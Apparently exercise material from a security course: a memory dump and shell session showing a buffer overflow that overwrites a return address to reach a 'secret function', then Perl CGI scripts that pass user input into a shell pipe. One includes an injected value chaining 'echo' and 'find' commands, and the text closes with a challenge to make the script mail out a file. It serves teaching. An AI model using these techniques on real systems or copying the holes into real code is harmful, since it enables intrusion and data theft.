0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
?
Hello secret1( ) !!!
$ poof Input: A You entered A. $ cat poop import struct rip = 0x0000000100000e40 print("A"*24 + struct.pack("<q", rip)) $ python poop | poof Input: You entered AAAAAAAAAAAAAAAAAAAAAAAA@^N. You found the secret function No. 1! Segmentation fault $
#!/usr/bin/perl# funky CGI script example$dest = "foo1"; # pretend this is the destination address from the useropen (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmailprint MAIL "To: $dest\nFrom: me\n\nHi there!\n";close MAIL;
!/usr/bin/perl# funky CGI script example$dest = "foo1; echo 'this could be bad!';find . -name '*.c' -print;";open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmailprint MAIL "To: $dest\nFrom: me\n\nHi there!\n";close MAIL;
/usr/bin/perl –w# (1) quit unless we have the correct number of command-line args$num_args = $#ARGV + 1;if ($num_args != 2) { print "\nUsage: name.pl email-address brief-message\n"; exit;}
# (2) we got two command line args, so assume it’s address$dest=$ARGV[0];$content=$ARGV[1];
my $sendmail = "/usr/sbin/sendmail -t";
#open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmailopen (MAIL,"|$sendmail") or die "Cannot open sendmail: $!";
print MAIL "To: $dest\n";print MAIL "From: me\n";print MAIL "Subject: test\n";print MAIL "Content-type: text/plain\n\n";print MAIL $content;close MAIL;
Run it with./tryit.pl ccpalmer “Some long message here inside quotes”
Could you find a way to trick the perl script into mailing you some file that it shouldn’t???